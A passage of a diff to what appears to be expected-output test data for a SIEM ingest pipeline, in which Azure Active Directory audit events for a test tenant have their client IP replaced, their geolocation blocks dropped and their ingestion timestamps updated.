ue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125324600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -17651,25 +16121,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -17683,7 +16135,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -17819,7 +16271,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -17831,12 +16283,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036547200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125330300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -17862,25 +16314,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -17894,7 +16328,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -18030,7 +16464,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -18042,12 +16476,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036551400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\